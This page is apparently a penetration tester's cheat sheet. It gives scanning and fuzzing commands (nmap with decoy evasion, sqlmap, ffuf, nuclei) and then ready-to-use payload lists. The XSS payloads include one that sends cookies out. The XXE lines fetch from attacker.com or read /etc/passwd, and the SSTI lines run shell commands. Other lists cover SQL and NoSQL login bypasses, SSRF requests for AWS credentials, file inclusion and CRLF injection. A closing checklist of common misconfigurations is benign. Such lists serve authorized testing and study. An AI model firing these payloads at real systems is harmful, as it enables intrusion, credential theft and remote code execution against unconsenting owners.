Handy Commands & Payloads
Commands and Payloads that I use the most to get the basics covered.
Nmap
Initial Port Scan and Service Scan with Evasive Techniques:
nmap -f -D RND:10 -p- -Pn $TARGET
nmap -sC -sV -p $(nmap -f -D RND:10 -p- -Pn $TARGET | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',') $TARGET
Other nmap scans:
sudo nmap -Pn -p 3389 -ff -send-eth -script rdp-enum-encryption $IP
Test SSL
testssl $URL
Nikto
nikto -host $URL
nikto -h $URL -O STATIC-COOKIE="Authorization: Bearer..."
Nuclei
nuclei -u $URL
nuclei -u $URL -H "cookie: "
# Use secrets.yaml file for other authentication mechanisms
Nuclei Fuzzer
nf -d $URL
Directory Fuzzing
Gobuster:
gobuster dir -u $URL -t 20 -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -b 302,404 -o gobuster_dir.txt
ffuf (Basic):
ffuf -u $URL/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -mc 200 -c -r -sf -t 20 -o ffuf_dir.csv -of csv
Ffuf (API):
ffuf -request api.req -w /opt/SecLists/Discovery/Web-Content/api/common-paths,actions-lowercase,/opt/SecLists/Fuzzing/special-chars.txt -request-proto http -mc 200 -c -r -sf -o fuff_api_dir.csv -of csv
VHOST Fuzzing
ffuf -H "Host: FUZZ.collect.htb" -u http://collect.htb/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -mc all -c -r -sf -ac -o subd_ffuf.txt
SQLi
sqlmap -r app.req --level 5 --risk 3 --batch
XSS Best Payloads
<script>alert(1)</script>
<script src=//14.rs></script>
"><svg onload=alert()>
<embed src=//14.rs>
<!--><script src=//14.rs>
url=%26%2302java%26%23115cript:alert(document.domain)
<video><source onerror=location=/\02.rs/+document.cookie>
<script>alert(document.domain)</script>
<a href=javascript:confirm()>click here
SQL Injection Payloads
' OR '1'='1
' OR '1'='1' --
' OR '1'='1' /*
' OR '1'='1' //
' OR '1'='1' #
admin' --
admin' /*
admin' //
admin' #
' OR 1=1
' OR 1=1 --
' OR 1=1 /*
' OR 1=1 //
' OR 1=1 #
' OR 'a'='a
' OR 'a'='a' --
' OR 'a'='a' /*
' OR 'a'='a' //
' OR 'a'='a' #
NoSQL Injection Payloads
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": "admin", "password": {"$ne": null}}
{"username": "admin", "password": {"$gt": ""}}
{"username": "admin", "password": {"$in": [""]}}
{"username": "admin", "password": {"$where": "this.password.length > 0"}}
{"username": {"$gt": ""}, "password": {"$gt": ""}}
{"username": {"$regex": ".*"}, "password": {"$ne": null}}
{"username": {"$eq": "admin"}, "password": {"$ne": "admin"}}
{"username": {"$ne": "admin"}, "password": {"$exists": true}}
{"username": {"$in": ["admin", "user"]}, "password": {"$ne": "password"}}
SSRF Payloads
# Retrieve AWS Metadata
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/user-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/meta-data/public-keys/
http://169.254.169.254/latest/meta-data/network/interfaces/macs/
http://127.0.0.1:80
http://127.0.0.1:8080
http://localhost:80
http://localhost:8080
http://0.0.0.0:80
http://0.0.0.0:8080
http://[::]:80
http://[::]:8080
http://[::1]:80
http://[::1]:8080
http://internal-service:80
http://internal-service:8080
XXE Payloads
xmlCopy code<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "http://attacker.com/evil.dtd" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "ftp://attacker.com/evil.txt" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "jar:http://attacker.com/evil.jar!/" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "gopher://attacker.com/evil" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "data:text/plain,evil" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "expect://id" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "php://input" > ]><foo>&xxe;</foo>
SSTI Payloads
# jinja
{{7*7}}
{{7*'7'}}
{{7*'7'.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}
{{config.items()}}
{{''.__class__.__mro__[2].__subclasses__()}}
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
{{request['application']['__globals__']['__builtins__']['__import__']('os').popen('id').read()}}
{% for c in [].__class__.__base__.__subclasses__() %}
{{c}}
{% endfor %}
{{''.__class__.mro()[1].__subclasses__()[40].__init__.__globals__['__builtins__']['__import__']('os').popen('id').read()}}
{{config['SECRET_KEY'].__class__.__mro__[2].__subclasses__()[40]('id').read()}}
{{request.application.__globals__.__builtins__.open('index.html').read()}}
File Inclusion Payloads
../../../../../../etc/passwd
../../../../../../boot.ini
../../../../../../windows/win.ini
../../../../../../winnt/win.ini
../../../../../../windows/system.ini
../../../../../../windows/system32/drivers/etc/hosts
../../../../../../winnt/system32/drivers/etc/hosts
../../../../../../apache/logs/access.log
../../../../../../apache/logs/error.log
../../../../../../usr/local/apache/logs/access.log
../../../../../../usr/local/apache/logs/error.log
../../../../../../var/www/html/index.php
../../../../../../var/www/html/wp-config.php
../../../../../../usr/local/etc/php.ini
../../../../../../etc/httpd/conf/httpd.conf
../../../../../../etc/mysql/my.cnf
CRLF Injection Payloads
GET / HTTP/1.1\r\nHost: example.com\r\nX-Custom-Header: custom-value\r\n
GET /index.html HTTP/1.1\r\nHost: example.com\r\nX-Injected-Header: injected-value\r\n
POST /submit HTTP/1.1\r\nHost: example.com\r\nX-Custom-Header: custom-value\r\n
GET / HTTP/1.1\r\nHost: example.com\r\nSet-Cookie: injected-cookie=value\r\n
POST /login HTTP/1.1\r\nHost: example.com\r\nX-Injected-Header: injected-value\r\n
GET /search?q=test HTTP/1.1\r\nHost: example.com\r\nX-Injected-Header: injected-value\r\n
POST /upload HTTP/1.1\r\nHost: example.com\r\nX-Custom-Header: custom-value\r\n
GET /download HTTP/1.1\r\nHost: example.com\r\nX-Injected-Header: injected-value\r\n
POST /create HTTP/1.1\r\nHost: example.com\r\nX-Custom-Header: custom-value\r\n
GET /api/v1/data HTTP/1.1\r\nHost: example.com\r\nX-Injected-Header: injected-value\r\n
Easy Vulnerabilities & Security Misconfigurations to Report
Vulnerabilities that could be found in the early stages (first few hours) of a pentest.
Security Headers
Misconfigured Security Headers:
X-Frame-Options
X-XSS-Protection
X-Content-Type-Options
Strict-Transport-Security
Content-Security-Policy (CSP)
Referrer-Policy
Cross-Origin Resource Sharing (CORS)
Insecure CORS Configuration:
Allowing wildcard (*) origin
Allowing untrusted origins
Lack of proper validation
Cookie Attributes
Insecure Cookie Attributes:
Missing HttpOnly flag
Missing Secure flag
Missing SameSite attribute
Authentication & Session Management
Concurrent Logins Allowed:
Multiple sessions from different IPs
Improper Session Timeout:
Long or no session expiration
Improper Invalidation of Cookie Post Logout:
Session remains active after logout
Weak Password Policies:
No complexity requirements
Lack of rate limiting
File Handling
Unrestricted File Upload:
No file type validation
No file size restrictions
No scanning for malware
Access Controls
Staging Environment Accessible from External Network:
Exposed internal environments
Sensitive Directories Accessible:
/.git/, /.svn/, /backup/, /config/
Web Server Configuration
Clickjacking:
Missing X-Frame-Options header
Weak SSL Ciphers:
Use of deprecated SSL/TLS versions
Weak cipher suites enabled
Web Server Fingerprinting:
Banner Grabbing revealing server information
Information Disclosure
Verbose Error Messages:
Detailed stack traces
Application/Server details in error messages
Directory Listing Enabled:
Ability to list files in web directories
Business Logic & Other Issues
Lack of Rate Limiting:
Brute force or DoS vulnerabilities
No Account Lockout:
Unlimited login attempts
Weak Default Credentials:
Use of default passwords for admin accounts
HTTP Methods:
TRACE/TRACK methods enabled
Referrer Policy:
No Referrer Policy header
API Security:
Lack of authentication
Lack of rate limiting
Exposed sensitive endpoints
Insecure Direct Object References (IDOR):
Direct access to unauthorized resources
Lack of Input Validation:
No sanitization of user input
Additional Points
Backup Files Accessible:
.bak, .old, .save files accessible
Exposed API Keys or Tokens:
API keys or tokens in URLs, JavaScript, etc.
Insufficient Logging and Monitoring:
Lack of logging for security events
Cross-Site Request Forgery (CSRF):
Missing or incorrect CSRF tokens
Insufficient Transport Layer Security:
HTTP instead of HTTPS
Autocomplete Enabled for Sensitive Fields:
Sensitive form fields have autocomplete enabled
Insecure Directories:
/admin/, /config/, /backup/ directories exposed
Insecure Third-Party Integrations:
Unpatched or outdated third-party libraries and frameworks
Last updated